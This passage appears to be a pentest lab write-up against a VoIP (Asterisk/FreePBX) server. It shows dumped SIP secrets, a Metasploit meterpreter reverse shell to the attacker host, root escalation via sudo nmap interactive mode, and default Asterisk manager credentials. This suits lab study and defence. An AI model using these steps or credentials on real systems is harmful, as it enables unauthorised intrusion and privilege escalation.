Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT
100                                                          from-internal    Yes  Always
101                        s3cur3                            from-internal    Yes  Always
102                        letmein123                        from-internal    Yes  Always
201                        secret123                         from-internal    Yes  Always
200                        quit3s3curE123                    from-internal    Yes  Always
2000                       password123                       from-internal    Yes  Always

exploit-method

Username: support
Password: securesupport123

http://192.168.108.196/admin/modules/

msf exploit(handler) > set LHOST 192.168.108.113
LHOST => 192.168.108.113
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.108.113  yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse handler on 192.168.108.113:4444 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 192.168.108.196
[*] Meterpreter session 1 opened (192.168.108.113:4444 -> 192.168.108.196:51358) at 2015-02-09 04:52:05 +0000

meterpreter > shell
Process 14996 created.
Channel 1 created.
sh: no job control in this shell
sh-3.2$ id
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)
sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

Runas and Command-specific defaults for asterisk:


User asterisk may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /usr/bin/nmap


sh-3.2$ sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish.  Results are printed to the
screen (of course you can still use file output commands).
! <command>   -- runs shell command given in the foreground
x             -- Exit Nmap
f [--spoof <fakeargs>] [--nmap-path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen).  You should generally specify a
file for results (with -oX, -oG, or -oN).  If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings.  If you wish to execute a special
version of Nmap, specify --nmap-path.
n -h          -- Obtain help with Nmap syntax
h             -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24

nmap> !sh
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2#

set up a environment

platform: Linux gnu 3.12-kali1-686-pae #1 SMP Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux

root@gnu:/etc/asterisk# apt-get install asterisk
root@gnu:/etc/asterisk/manager.d# cat README.conf 
; please read the documentation regarding the Manager Interface (asterisk-doc package)

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,originate
write = system,call,log,verbose,command,agent,user,originate
; read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
; write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

root@gnu:/etc/asterisk/manager.d# service asterisk start
Starting Asterisk PBX: asterisk.
root@gnu:/etc/asterisk# ncat -v 127.0.0.1 5038
Ncat: Version 6.46 ( http://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted

Event: FullyBooted
Privilege: system,all
Status: Fully Booted

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  ForcerPort
--END COMMAND--

References

[1].http://www.rebootuser.com/?p=1117
[2].https://resources.enablesecurity.com/resources/Storming%20SIP%20Security%20Captions.pdf
[3].http://chousensha.github.io/blog/2014/10/07/pentest-lab-vulnvoip/
[4].http://www.freepbx.org/support/documentation/administration-guide/asterisk-cli-commands
[5].http://www.xtelsio.com/hlp/en/ast/ast/asterisk_manager.htm
[6].https://github.com/fozavci/viproy-voipkit
[7].http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP